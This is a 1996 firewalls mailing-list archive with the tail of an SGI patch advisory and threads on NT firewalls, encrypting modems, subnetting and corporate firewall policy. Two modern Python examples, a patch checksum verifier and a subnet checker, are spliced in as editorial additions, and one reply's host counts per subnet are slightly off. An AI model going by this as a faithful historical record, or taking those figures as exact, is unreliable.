The SGI anonymous ftp site is sgigate.sgi.com (204.94.209.1). Patch 1048 can be found in the following directories on the ftp server:

        ~ftp/Security

        or

        ~ftp/Patches/5.3

   ##### Checksums ####

The actual patch will be a tar file containing the following files:

        README.patch.1048
        patchSG0001048
        patchSG0001048.cadmin_sw
        patchSG0001048.eoe1_sw
        patchSG0001048.eoe2_sw
        patchSG0001048.idb

   **** IRIX 6.1 ****

For the IRIX operating system version 6.1, an inst-able patch has been generated and made available via anonymous ftp and/or your service/support provider. The patch is number 1090 and will install on IRIX 6.1.

The SGI anonymous ftp site is sgigate.sgi.com (204.94.209.1). Patch 1090 can be found in the following directories on the ftp server:

        ~ftp/Security

        or

        ~ftp/Patches/6.1

   ##### Checksums ####

The actual patch will be a tar file containing the following files:

        README.patch.1090
        patchSG0001090
        patchSG0001090.cadmin_sw
        patchSG0001090.idb

- ------------------------
- --- Acknowledgments ---
- ------------------------

Silicon Graphics wishes to thank Kari E. Hurtta, FIRST members and CERT organizations worldwide for their assistance in this matter.

- -----------------------------------------
- --- SGI Security Information/Contacts ---
- -----------------------------------------

Past SGI Advisories and security patches can be obtained via anonymous FTP from sgigate.sgi.com or mirror site ftp.sgi.com. These security patches and advisories are provided freely to all interested parties. For issues with the patches on the FTP sites, email can be sent to cse-security-alert@csd.sgi.com.

For assistance obtaining or working with security patches, please contact your SGI support provider.

If there are questions about this document, email can be sent to cse-security-alert@csd.sgi.com.

For reporting *NEW* SGI security issues, email can be sent to security-alert@sgi.com or by contacting your SGI support provider.
-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----

From firewalls-owner Wed Jan 3 15:07:23 1996
Message-ID: <01BADA69.AAE0F240@rwcooper.rcooper.the-wire.com>
From: Russ Cooper
To: "hans@lpa.se", "'pc@bim.be'"
Cc: "firewalls@GreatCircle.COM"
Subject: RE: Firewall for Windows NT?
Date: Thu, 4 Jan 1996 05:58:26 -0500

Catapult is at Beta II now; I'll be happy to tell more when I'm out from under this NDA. All I can say for now is that it will be good for *smaller* installations that are running *mostly* MS-based OS's.

Cheers,
Russ Cooper
Sr. Internet Integration Engineer
SHL/Computer Innovations
rcooper@the-wire.com -- rwcooper@shl.com
"can someone tell me where to go today to get the money to go to where I want to go today"

From firewalls-owner Wed Jan 3 16:07:23 1996
Date: Wed, 03 Jan 96 15:26:49
From: "Abernathy, Jim"
Message-Id: <9600038207.AA820711609@nascar.sf.frb.org>
To: firewalls@greatcircle.com, Chris Kostick
Subject: Re: encrypting modems

Chris,

Here is an old list of Modem Encryption vendors I had. This is old and they may have combined with another company or moved, but here they are. I have worked with vendors Jones Futurex and Racal-Milgo quite a bit with some of their products.
This is not an endorsement for any of these vendors:

Old Security Modem Vendors List:

Adaptive Computer Technologies, CA     415 324-0121
Anchor Automation, CA                  818 998-6100
AT&T, NJ                               201 221-2200
Bizcomp Corp, CA                       408 733-7800
CASE/Datatel, Inc NJ                   609 424-4451
Cermetek Microelectronics Inc, CA      408 752-5000
Codex Corp, MA                         617 364-2000
Concord Data Systems Inc, MA           508 460-0808
CXR Telcom/Anderson Jacobson, CA       408 435-8520
Data Race, Inc, TX                     512 692-3909
Datec, Inc, NC                         800 334-7722
Digital Pathways, Inc, CA              415 964-0707
Emucom, Inc,                           508 970-1189
Fastcomm Data Corp, VA                 703 620-3900
Gandalf Data Inc,                      312 541-6060, 800 GANDALF
Jones Futurex, CA                      916 632-3456
Microcom Inc, MA                       508 551-1000
Natural Microsystems Corp, MA          508 655-0700
NEC America, Inc, CA                   408 433-1250
Octocom Systems, MA                    508 658-6050
Okidata Corp, NJ                       609 235-2600
Prometheus Productions, Inc, OR        503 624-0571
Racal-Milgo, Inc, FL                   305 476-5609, 800 327-4440
Racal-Vadic, Inc CA                    408 946-2227
Singer Data Products Inc, IL           312 860-6500
Transend Corp, CA                      415 851-3402
Tri-Data Systems Inc, CA               408 746-2900
Universal Data Systems, AL             205 721-8000
Visionary Electronics, Inc, CA         415 751-8811
Western DataCom Co, OH                 216 835-1510
ZyXEL, CA                              714 693-0808

Jim Abernathy
FRB San Francisco
415 974-2798

______________________________ Reply Separator _________________________________
Subject: encrypting modems
Author: Chris Kostick at INET-MAIL-GATEWAY@FRB12
Date: 1/2/96 10:34 PM

From: Chris Kostick
Message-Id: <199601030358.WAA00783@mccoy.ashton.csc.com>
Subject: encrypting modems
To: firewalls@greatcircle.com
Date: Tue, 2 Jan 1996 22:58:55 -0500 (EST)

Can anyone provide me a list of vendors who make encrypting modems? That is, a modem with encryption in hardware rather than software on a machine just sending out over a modem.

-- chris

From firewalls-owner Wed Jan 3 18:11:38 1996
From: Jonny Llama
Message-Id: <199601040159.UAA09190@ra1.randomc.com>
Subject: Re: Compression is useful - but for security, not
To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Information Security)
Date: Wed, 3 Jan 1996 20:59:43 -0500 (EST)
Cc: firewalls@greatcircle.com
In-Reply-To: <960103094524.2020153c@hobbes.orl.mmc.com> from "A. Padgett Peterson, P.E.
Information Security" at Jan 3, 96 09:45:24 am

> I rote
>
> > 1) Compression aids performance. It does not aid security (at best is SBO).
>
> Julian wresponded:
>
> > Not so! Compressed plain text, which is then ciphered is several orders
> > of magnitude harder to break (depending on the compression scheme and attack).
>
> Any cipher scheme that is effectively strengthened by compression is not
> very good encryption IMNSHO. True, if you use a rearranged XXENCODE table
> as your cipher scheme, compression will make it more difficult to break
> (provided you remove the headers). Triple DES or SKIPJACK is hard enough
> to break that compression makes no effective difference.
>
> Warmly,
> Padgett

Compressing data obscures redundancies in the plaintext, taking diffusion and confusion one extra step. This characteristic is found in at least one of its two forms in any 'good' cipher. Unless that whizzing was something flying past my head..

-llama

From firewalls-owner Wed Jan 3 20:37:23 1996
Date: Thu, 04 Jan 96 09:24:20 eet
From: "Greg Hume"
Message-Id: <9600048207.AA820798228@mailgate.cybergraphic.com.au>
To: pc@bim.be, firewalls@greatcircle.com
Subject: Re[2]: Firewall for Windows NT?

I have tried without success to find any information on this. Could you quote your source please, or point me in the right direction?

Thanks
Greg.
Systems Analyst.

______________________________ Reply Separator _________________________________
Subject: Re: Firewall for Windows NT?
Author: pc@bim.be at mailgate
Date: 1/4/96 5:54 AM

A firewall called "catapult" is announced by Microsoft. I don't know when it will be available.

Philippe
--
Ph. Cayphas
Senior Engineer
E-Mail:       pc@bim.be
Telephone:    +32(10)47.08.32
Fax:          +32(10)47.08.11
Postal Mail:  Ph. Cayphas
              BIM sa
              4, Av.
              Albert Einstein
              1348 Louvain-La-Neuve
              Belgium

From firewalls-owner Wed Jan 3 21:07:26 1996
From: ibg@oro.net
Date: Wed, 3 Jan 1996 20:58:11 -0800
Message-Id: <199601040458.UAA09885@hg.oro.net>
Subject: Re: Firewalls-Digest V5 #3
To: Firewalls@GreatCircle.COM

Please stop sending these e-mails. Thanks.

From firewalls-owner Wed Jan 3 21:22:22 1996
From: ibg@oro.net
Date: Wed, 3 Jan 1996 20:57:40 -0800
Message-Id: <199601040457.UAA09873@hg.oro.net>
Subject: Re: Firewalls-Digest V5 #4
To: Firewalls@GreatCircle.COM

Please stop sending these e-mails. Thanks.
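The SGI advisory earlier on this page tells you to fetch patch files and check them against published values: a BSD-style `sum -r` checksum, a System V `sum` checksum and an MD5 digest per file. The following is an added example, not SGI's code: it reimplements both `sum` algorithms, parses one checksum record written in the advisory's layout, and verifies a file against it. The record, the placeholder filename and the three-byte file it describes are constructed for the example.

```python
import hashlib
import re

# Both algorithms report a block count after the checksum. The advisory shows
# the same count for 'sum -r' and 'sum', so both are taken as 512-byte blocks
# here (GNU coreutils' 'sum -r' prints 1K blocks instead; adjust if needed).
BLOCK_SIZE = 512


def bsd_sum(data: bytes) -> tuple:
    """BSD 'sum -r': a 16-bit checksum rotated right one bit before each byte
    is added, plus the size in blocks (rounded up)."""
    checksum = 0
    for byte in data:
        checksum = (checksum >> 1) + ((checksum & 1) << 15)
        checksum = (checksum + byte) & 0xFFFF
    return checksum, -(-len(data) // BLOCK_SIZE)


def sysv_sum(data: bytes) -> tuple:
    """System V 'sum': the plain byte total folded down to 16 bits with
    end-around carry, plus the size in blocks (rounded up)."""
    total = sum(data)
    folded = (total & 0xFFFF) + ((total & 0xFFFFFFFF) >> 16)
    checksum = (folded & 0xFFFF) + (folded >> 16)
    return checksum, -(-len(data) // BLOCK_SIZE)


def md5_hex(data: bytes) -> str:
    """Upper-case hex MD5 digest, the form the advisory prints."""
    return hashlib.md5(data).hexdigest().upper()


# One record in the advisory's layout: a Filename line followed by the three
# checksum lines. Whitespace is matched loosely so a record parses whether it
# is laid out one item per line or has been run together on a single line.
RECORD_RE = re.compile(
    r"Filename:\s*(?P<name>\S+)\s*"
    r"Algorithm #1 \(sum -r\):\s*(?P<bsd>\d+)\s+(?P<bsd_blocks>\d+)\s+\S+\s*"
    r"Algorithm #2 \(sum\):\s*(?P<sysv>\d+)\s+(?P<sysv_blocks>\d+)\s+\S+\s*"
    r"MD5 checksum:\s*(?P<md5>[0-9A-Fa-f]{32})"
)


def parse_checksum_records(text: str) -> dict:
    """Map each filename in a checksum section to its expected values."""
    records = {}
    for m in RECORD_RE.finditer(text):
        records[m["name"]] = {
            "bsd": (int(m["bsd"]), int(m["bsd_blocks"])),
            "sysv": (int(m["sysv"]), int(m["sysv_blocks"])),
            "md5": m["md5"].upper(),
        }
    return records


def verify_file(data: bytes, expected: dict) -> list:
    """Names of the checks that FAIL for this file's contents; an empty list
    means every published value matched."""
    failures = []
    if bsd_sum(data) != expected["bsd"]:
        failures.append("sum -r")
    if sysv_sum(data) != expected["sysv"]:
        failures.append("sum")
    if md5_hex(data) != expected["md5"]:
        failures.append("md5")
    return failures


def verify_all(section: str, files: dict) -> dict:
    """Verify every file a checksum section lists: {filename: failures}."""
    expected = parse_checksum_records(section)
    return {name: verify_file(files[name], rec) for name, rec in expected.items()}


# Constructed sample: a made-up checksum section in the advisory's format.
# The filename is a placeholder; the values are those of the 3-byte file "abc".
SAMPLE_SECTION = """
   ##### Checksums ####

Filename:                 README.patch.EXAMPLE
Algorithm #1 (sum -r):    16556 1 README.patch.EXAMPLE
Algorithm #2 (sum):       294 1 README.patch.EXAMPLE
MD5 checksum:             900150983CD24FB0D6963F7D28E17F72
"""
SAMPLE_FILES = {"README.patch.EXAMPLE": b"abc"}   # constructed file contents


if __name__ == "__main__":
    for name, failures in verify_all(SAMPLE_SECTION, SAMPLE_FILES).items():
        print(name, "OK" if not failures else "MISMATCH: " + ", ".join(failures))
```

The two `sum` values only guard against transfer corruption; a substituted file has to be caught by the MD5, and that only helps if the advisory carrying the digests was itself checked against its PGP signature.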
From firewalls-owner Wed Jan 3 21:37:22 1996
From: ibg@oro.net
Date: Wed, 3 Jan 1996 20:58:34 -0800
Message-Id: <199601040458.UAA09898@hg.oro.net>
Subject: Re: Firewalls-Digest V5 #2
To: Firewalls@GreatCircle.COM

Please stop sending these e-mails. Thanks.

From firewalls-owner Wed Jan 3 23:07:24 1996
From: Jon Whitton
Subject: Bastion netmask query
To: firewalls@greatcircle.com
Date: Thu, 4 Jan 1996 06:53:26 +0000 (GMT)

We have a class C of our own A.B.C.0 and are currently configuring the network as follows:

 Addresses A.B.C.1 to 15

 ISP       +-----------+                      +-----------+
 Lease     |   Cisco   |----------------------|  ftp/web  |  plus others
 ----      |   2514    |           |          |  machine  |  as needed
 Line      |           |-----------|          |           |
           +-----------+           |          +-----------+
                                   | subnet is A.B.C.16 to 31
                                   |
                                   | eth0 A.B.C.31
                             +-----------+
                             |  Bastion  |  Dual Homed
                             |  Machine  |
                             |           |
                             +-----------+
                                   | eth1 A.B.C.32
                                   |
                                   | subnet is A.B.C.32 to 254
                -------------------|------------------------  Secure Internal

Can anyone confirm what the netmasks and broadcast addresses should be for the two bastion ethernet devices?

We are having some trouble agreeing on these.

TIA, Jon
--
================================================================================
Jon Whitton.                    Internet Address: jonw@mntcmp2.demon.co.uk
================================================================================
--

From firewalls-owner Thu Jan 4 00:37:24 1996
From: gamble@dxcoms.cern.ch
Message-Id: <9601040824.AA23767@dxcoms.cern.ch>
To: firewalls@GreatCircle.com
Cc: gamble@dxcoms.cern.ch, pdetemme@cisco.com
Subject: Looking for a speaker
Date: Thu, 04 Jan 96 09:24:28 +0100

Folks,

This is not exactly a normal firewalls question, but I am looking for help on this topic on behalf of someone else:-

On March 13th 1996 Cisco Systems SA (Switzerland) is organising a short seminar on security and are looking for someone who would be able to give a short presentation on this topic.
If there is anyone who would be interested, could they please contact Pascal DETEMMERMAN, pdetemme@cisco.com for more information. I believe the venue will be in the Geneva area.

Thanks. Oh ... and happy New Year ...

From firewalls-owner Thu Jan 4 03:22:24 1996
From: PDA-BB@ccmail.valmet.com
Message-Id: <199601041110.NAA17028@tre-vta.valmet.com>
Date: Thu, 4 Jan 1996 13:06 EET
To: firewalls@greatcircle.com
Subject: Firewalls in Many Countries

---------------------------------- Forwarded ----------------------------------
From: telomas@upj.com at INTERNET
Date: 1/3/96 3:31PM
Forwarded by: firewalls-owner@greatcircle.com at INTERNET
*To: firewalls@greatcircle.com at INTERNET
Subject: Firewalls in Many Countries
-------------------------------------------------------------------------------

The Pharmacia and Upjohn Companies merged last November. We are merging/changing the firewalls and Internet access points within the company. How do you do that and still give adequate service levels? We have queried our ISP and only received vague answers. It has been hard for me to find knowledgeable people within companies that understand firewalls, security issues and network issues.

I am a strong proponent of local administration because I do not see how you can provide adequate response time to serious problems if the people that are supporting the firewall or if the vendor that supports the firewall is across the ocean. However, others within our new company think that centralization of firewall support and firewalls is critical. There is also a group that feels it does not want to "pay" for the external IP traffic running across the internal network if adequate security can be provided by adding additional firewalls.

KEY QUESTIONS: How many firewalls and Internet sites of access should we have and how should they be supported? Select and support one firewall vendor? Local versus remote administration?

Service Level: Respond to security problems immediately, and fix technical problems within 24 hours. Therefore, even mail could be down at a site for 24 hours, although this seems like a long time to me. Management is very sensitive to the idea of the Internet and because of this, investigating unknown problems is a high priority.

Users: We have a current or potential Internet user population of over 1000 users in Uppsala, Sweden; Milan, Italy; Kalamazoo, Michigan (USA); and Tsukuba, Japan. There are many other smaller sites that do (or will) receive Internet access by using the firewalls.

Firewalls: We currently have two firewalls for Internet access: Kalamazoo (firewall is ANS Interlock - Solaris) and Uppsala (firewall is Dec Seal). We will probably add a third in Japan shortly.

Services allowed: Outbound FTP, TELNET, HTTP and of course smtp for mail. A few additional services are being piloted but have not yet been approved (WinCIM for Compuserve; SciFinder for access to an external database). Essentially anyone who has been given a TCP/IP address on an authorized network can obtain access to Internet services.

TCP/IP addresses: We have one class B address and multiple class C's.
From firewalls-owner Thu Jan 4 04:07:25 1996
Message-Id: <199601041150.DAA21062@lint.cisco.com>
Date: Thu, 04 Jan 1996 06:51:13 -0500
To: Jon Whitton
From: Paul Ferguson
Subject: Re: Bastion netmask query
Cc: firewalls@GreatCircle.COM

At 06:53 AM 1/4/96 +0000, Jon Whitton wrote:
>
> We have a class C of our own A.B.C.0 and are currently configuring the
> network as follows:
>

This is a confusing statement [We have a class C of our own A.B.C.0...]. What exactly does it mean? It would certainly help to tell us what the network address actually is.

>  Addresses A.B.C.1 to 15
>
>  ISP       +-----------+                      +-----------+
>  Lease     |   Cisco   |----------------------|  ftp/web  |  plus others
>  ----      |   2514    |           |          |  machine  |  as needed
>  Line      |           |-----------|          |           |
>            +-----------+           |          +-----------+
>                                    | subnet is A.B.C.16 to 31
>                                    |
>                                    | eth0 A.B.C.31
>                              +-----------+
>                              |  Bastion  |  Dual Homed
>                              |  Machine  |
>                              |           |
>                              +-----------+
>                                    | eth1 A.B.C.32
>                                    |
>                                    | subnet is A.B.C.32 to 254
>                 -------------------|------------------------  Secure Internal
>
> Can anyone confirm what the netmasks and broadcast addresses should be for the
> two bastion ethernet devices.
>
> We are having some trouble agreeing on these.
>
> TIA, Jon
>

Firstly, if you are using a 4 bit subnet mask on a traditional 'class c' network, then the subnet 'A.B.C.32 to 254' is an invalid subnet. I would suggest obtaining and reading RFC-1878, Variable Length Subnet Table For IPv4.

- paul

--
Paul Ferguson                       ||        ||
Consulting Engineering              ||        ||
Reston, Virginia USA               ||||      ||||
tel: +1.703.716.9538           ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com      c i s c o S y s t e m s

From firewalls-owner Thu Jan 4 06:10:10 1996
From: Jody C Patilla
Message-Id: <9601041353.AA22198@tis.com>
Subject: Re: Livingston Firewall IRX router
To: firewalls@GreatCircle.COM
Date: Thu, 4 Jan 1996 08:52:51 -0500 (EST)
In-Reply-To: <199601032110.NAA05372@uni.ins.com> from "Kenneth Kron" at Jan 3, 96 01:10:08 pm

>
> As far as the Livingston IRX router I really don't know as I haven't used it.
>

I'd like to hear from folks who are actually using it, please.

=========================================================================
Jody C. Patilla                 jcp@tis.com
Trusted Information Systems     Glenwood, Md.
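Jon Whitton's netmask question and Paul Ferguson's reply above (a 4-bit mask cannot describe A.B.C.32 to 254 as one subnet) can be checked mechanically. The following is an added example, not code from either poster: it uses Python's `ipaddress` module with the RFC 5737 documentation range 192.0.2.0/24 standing in for A.B.C.0, and goes one step beyond Paul's reply by also working out what the two bastion interface addresses in the diagram are under the same /28 mask.

```python
import ipaddress

# Constructed stand-in for the poster's "A.B.C.0" class C. 192.0.2.0/24 is the
# RFC 5737 documentation range, so nothing below refers to a real network.
CLASS_C = ipaddress.ip_network("192.0.2.0/24")


def host(last_octet: int) -> ipaddress.IPv4Address:
    """The address A.B.C.<last_octet> inside the stand-in class C."""
    return CLASS_C.network_address + last_octet


def smallest_enclosing_subnet(first: int, last: int) -> ipaddress.IPv4Network:
    """The smallest aligned CIDR block that contains both .first and .last.
    If it equals the range asked for, the range is a valid subnet; if it is
    larger, the range as drawn cannot be a single subnet."""
    for prefix in range(32, -1, -1):
        net = ipaddress.ip_network(f"{host(first)}/{prefix}", strict=False)
        if host(last) in net:
            return net
    raise AssertionError("unreachable: /0 contains every address")


def covering_blocks(first: int, last: int) -> list:
    """Aligned blocks needed to cover .first through .last exactly; more than
    one block means no single netmask describes the range."""
    return list(ipaddress.summarize_address_range(host(first), host(last)))


def check_interface(last_octet: int, prefix: int) -> dict:
    """Netmask, network and broadcast for an interface at A.B.C.<last_octet>
    under a /<prefix> mask, and whether that address is usable for a host."""
    iface = ipaddress.ip_interface(f"{host(last_octet)}/{prefix}")
    net = iface.network
    if iface.ip == net.network_address:
        role = "network address (not a usable host address)"
    elif iface.ip == net.broadcast_address:
        role = "broadcast address (not a usable host address)"
    else:
        role = "usable host address"
    return {
        "address": str(iface.ip),
        "netmask": str(net.netmask),
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "role": role,
    }


if __name__ == "__main__":
    # The three address ranges drawn in the posted diagram.
    for label, first, last in [("ISP / ftp-web side", 1, 15),
                               ("bastion eth0 side", 16, 31),
                               ("secure internal", 32, 254)]:
        blocks = covering_blocks(first, last)
        print(f"{label}: .{first}-.{last} -> enclosing block "
              f"{smallest_enclosing_subnet(first, last)}, "
              f"{len(blocks)} aligned block(s) needed to cover it")
    # The two bastion interfaces under the uniform /28 mask the diagram implies.
    for name, octet in [("eth0", 31), ("eth1", 32)]:
        print(name, check_interface(octet, 28))
```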
From firewalls-owner Thu Jan 4 07:25:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA07937 for firewalls-outgoing; Thu, 4 Jan 1996 07:04:48 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA07932 for ; Thu, 4 Jan 1996 07:04:43 -0800 (PST) Date: Thu, 4 Jan 1996 10:04:02 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960104100402.20c00896@hobbes.orl.mmc.com> Subject: Firewalls in many countries Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >It has been hard for me to find knowledgeable people within >companies that understand firewalls, security issues and network >issues. Is more complicated than that - you need someone who understands the corporate environment as well. It has strengths and weaknesses that are different from the bulk of the Internet community which is primarily military/academic/government/individuals. Believe me, operation inside a large corporation is different, not better, not worse, but different. >I am a strong proponent of local administration because I do not >see how you can provide adequate response time to serious >problems if the people that are supporting the firewall or if the >vendor that supports the firewall is across the ocean. However, >others within our new company think that centralization of >firewall support and firewalls is critical. Been there, done that, centralization is essential to security. Otherwise the preference of one component may jeopardize other elements. To avoid that there *must* be a common set of basic policies that govern all activities within the corporation. 
Each operating element can be permitted choices within that framework but the fact is that Internet security is a dynamic, rapidly evolving technology and a coprorate Czar is necessary to avoid endless bickering and committees that cannot respond quickly to emerging threats. The basic problem with a democratic organization is that of education of the citizens. Users (and management is a user) do no have the background and the resources are not available to give them the background necessary to make intelligent choices. So you have to select someone or a small group of people who have the background/training to make the decisions *and have the decisions applied*. >There is also a >group that feels does not want to "pay" for the external IP >traffic running across the internal network if adequate security >can be provided by adding additional firewalls. Fact: all rules are unfair to someone. Problems occur if that "someone" can obstruct "the greatest good for the greatest number". In the corporate world, doing nothing is the easiest choice. The *wrong* choice but the easiest one. >KEY QUESTIONS: How many firewalls and Internet sites of access >should we have and how should they be supported? Select and >support one firewall vendor? Local versus remote administration? That depends on your communications requirements and the level of protection rquired by the data (aka "What is the potential loss if compromised ?" - am fortunate to work for a company that has multi- billion dollar contracts so the question rarely arises. Have found that that some simplification is necessary - first except for special cases, do not worry about individual nodes, concern yourself with the networks and subnets. Have found that three sets of criteria are enough: 1) Fully exposed networks e.g. Internet connections 2) Limited exposure networks e.g. PNS leased lines to partners/customers who have signed an agreement for security 3) Internal networks. 
Type 1 is covered by corporate policy and has the most stringent requirements since a breach could potentially expose the enterprise. A single mechanism and corporate apporved vendor(s) are required. Types of connection permitted are limited (e.g. no UDP except DNS and that is limited to specified, trusted servers). At least two levels of protection (firewall/trusted host) are required. Type 2 has less stringent requirements and more flexibility for the site but is still somewhat constrained. The contract is considered a level of security but at least one additional level is necessary. Administration is by the site but central approval for connects is necessary. Type 3 are permitted unlimited access but no node is automatically trusted, instead networks containing sensitive material are separated by controls but may be as simple as the packet filtering provided by routers. Controls are up to the site/project/department though consulting from the central organization is available. >Service Level: Respond to security problems immediately, and fix >technical problems within 24 hours. Therefore, even mail could >be down at a site for 24 hours although this seems like a long >time to me. Management is very sensitive to the idea of the >Internet and because of this, investigating unknown problems is a >high priority. "Now" is better. I carry a beeper 24hours as do the rotating on- call staff. This must be available at each site though help desks may be centralized. What happens if the firewall goes down ? Do you have hot backup capability ? What if a backhoe takes out your trunks ? How do you determine if a security problem exists ? Do you have authority to cut off a system arbritarily (couple of years ago had to make a decision whether to shut down an entire production facility. The fact that a VP was standing there did not remove my authority to do so.) 
>Users: We have a current or potential Internet user population of
>over 1000 users in Uppsala, Sweden; Milan, Italy; Kalamazoo,
>Michigan (USA); and Tsukuba, Japan. There are many other smaller
>sites that do (or will) receive Internet access by using the
>firewalls.

Would consider that "medium sized". Large is when you have over 5,000 at a single site or over 100,000 total.

>Firewalls: We currently have two firewalls for Internet access:
>Kalamazoo (firewall is ANS Interlock - Solaris) Uppsala (firewall
>is Dec Seal). We will probably add a third in Japan shortly.

Well that could count as a single layer - what about modems/PPP ?

>Services allowed: Outbound FTP, TELNET, HTTP and of course smtp
>for mail.

Nobody uses GOPHER ? FINGER is blocked ? SHTP (port 443) ? Are you sure ?

Just some thoughts,
Padgett

From firewalls-owner Thu Jan 4 07:52:26 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA08401 for firewalls-outgoing; Thu, 4 Jan 1996 07:40:38 -0800 (PST)
Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA08396 for ; Thu, 4 Jan 1996 07:40:34 -0800 (PST)
Received: from cixgate by relay2.UU.NET with SMTP id QQzxbq02898; Thu, 4 Jan 1996 10:39:54 -0500 (EST)
Received: from manzanita.DEV.3Com.COM.noname ([139.87.180.206]) by cixgate (4.1/SMI-4.1/3com-cixgate-GCA-931027-01) id AA27646; Thu, 4 Jan 96 07:48:42 PST
Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) id AA07331; Thu, 4 Jan 96 07:34:31 PST
Date: Thu, 4 Jan 96 07:34:31 PST
From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg)
Message-Id: <9601041534.AA07331@manzanita.DEV.3Com.COM.noname>
To: firewalls@greatcircle.com, jonw@mntcmp2.demon.co.uk
Subject: Re: Bastion netmask query
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

You wrote:
>
> We have a class C of our own A.B.C.0 and are currently configuring the
> network as follows:
>
>                                              Addresses A.B.C.1 to 15
>
>  ISP      +-----------+                      +-----------+
>  Lease    |  Cisco    |----------------------|  ftp/web  |  plus others
>  ----     |  2514     |          |           |  machine  |  as needed
>  Line     |           |----------|           |           |
>           +-----------+          |           +-----------+
>                                  | subnet is A.B.C.16 to 31
>                                  |
>                                  | eth0 A.B.C.31
>                            +-----------+
>                            |  Bastion  |  Dual Homed
>                            |  Machine  |
>                            |           |
>                            +-----------+
>                                  | eth1 A.B.C.32
>                                  |
>                                  | subnet is A.B.C.32 to 254
>       -------------------|------------------------  Secure Internal
>
> Can anyone confirm what the netmasks and broadcast addresses should be for the
> two bastion ethernet devices.

First of all, these nets are using three different subnet classification schemes. This can cause problems unless carefully managed.

The subnet mask 255.255.255.240 will divide your class C address space into 16 subnets of 15 hosts each:
    A.B.C.0,   A.B.C.16,  A.B.C.32,  A.B.C.48,
    A.B.C.64,  A.B.C.80,  A.B.C.96,  A.B.C.112,
    A.B.C.128, A.B.C.144, A.B.C.160, A.B.C.176,
    A.B.C.192, A.B.C.208, A.B.C.224, A.B.C.240.

The subnet mask 255.255.255.224 will effectively divide your class C address space into 8 subnets of 31 hosts each:
    A.B.C.0,   A.B.C.32,  A.B.C.64,  A.B.C.96,
    A.B.C.128, A.B.C.160, A.B.C.192, A.B.C.224.

The subnet mask 255.255.255.192 will divide your class C into 4 subnets of 63 hosts each:
    A.B.C.0,   A.B.C.64,
    A.B.C.128, A.B.C.192.

It is possible to use different masks on each side of the router and bastion machine, but unless you are careful (or using OSPF) (I don't know how IGRP works), you are asking for trouble by splitting up subnets unevenly. In addition, you will find that any subnet that is part of a smaller division scheme, but not actually used must be thrown away if this is done with RIP (RIP V.2 can help some). On the other hand, you may be able to divide up the Class C, and then assign multiple subnets to your larger net, as long as you remember to use the smaller subnet masking scheme, and let the router handle communications between subnets.
I could write a lot more on the subject, but not being sure of your objectives, I'd rather not second guess you here.

Good luck,
BobK

From firewalls-owner Thu Jan 4 09:37:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA11325 for firewalls-outgoing; Thu, 4 Jan 1996 09:31:04 -0800 (PST)
Received: from mail.co.stanislaus.ca.us ([204.31.216.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA11320 for ; Thu, 4 Jan 1996 09:31:00 -0800 (PST)
Received: from STANCO#u#1-Message_Server by mail.co.stanislaus.ca.us with Novell_GroupWise; Thu, 04 Jan 1996 09:33:35 -0800
Message-Id:
X-Mailer: Novell GroupWise 4.1
Date: Thu, 04 Jan 1996 09:46:32 -0800
From: Mike Romeo
To: jcp@tis.com
Cc: firewalls@GreatCircle.COM
Subject: Re: Livingston Firewall IRX router -Reply
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

We are using a Livingston Firewall IRX @ our site, we try to block all but essential services and then limit those to the hosts that require them. The filtering in the IRX is basically in and/or out on each interface with the following criteria:

1. Source and Destination address with masking/subnetting
2. Protocol (TCP/UDP/ICMP)
3. Source and Destination port (gt/lt/eq, TCP & UDP) or Message Type (ICMP)
4. Established Session

The only problem I've had is that when I try to set up a filter for ICMP type 0 (ECHO REPLY if I read the RFC correctly) it refuses to accept that, so I just blocked all ICMP which can be a pain when we have a connectivity problem with our ISP.

I'm no TCP Guru and I'm not sure what you mean by dynamic/stateful packet filtering; if you clarify (read dumb down) the question maybe I would be able to answer it.

Setup was easy, but when you update the filter list there is no way to insert a rule so you have to rekey all the rules after the one you insert which allows a lot of room for finger checks and can cause an inadvertent hole in your system. The packet filtering syntax is less cryptic than CISCO's (IMHO).

If you want any more info I'll be happy to try and help

-------------------------------------------------------------------------------
Michael Romeo, Sr Systems Programmer
Stanislaus County, Modesto Ca.
209-525-5805
romeo@mail.co.stanislaus.ca.us

From firewalls-owner Thu Jan 4 10:37:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA13132 for firewalls-outgoing; Thu, 4 Jan 1996 10:35:43 -0800 (PST)
Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA13126 for ; Thu, 4 Jan 1996 10:35:39 -0800 (PST)
Received: from slip-9-14.shore.net by northshore.ecosoft.com with SMTP id AA29503 (5.67a/IDA-1.5 for ); Thu, 4 Jan 1996 13:34:06 -0500
Message-Id: <199601041834.AA29503@northshore.ecosoft.com>
Date: Thu, 04 Jan 96 18:35:01 0500
From: Vin McLellan
Organization: Privacy Guild
X-Mailer: Mozilla 1.1N (Macintosh; I; 68K)
Mime-Version: 1.0
To: firewalls@greatcircle.com
Subject: Email antivirus software debuts
X-Url: http://www.cnet.com/Content/News/Files/0,16,350,00.html
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

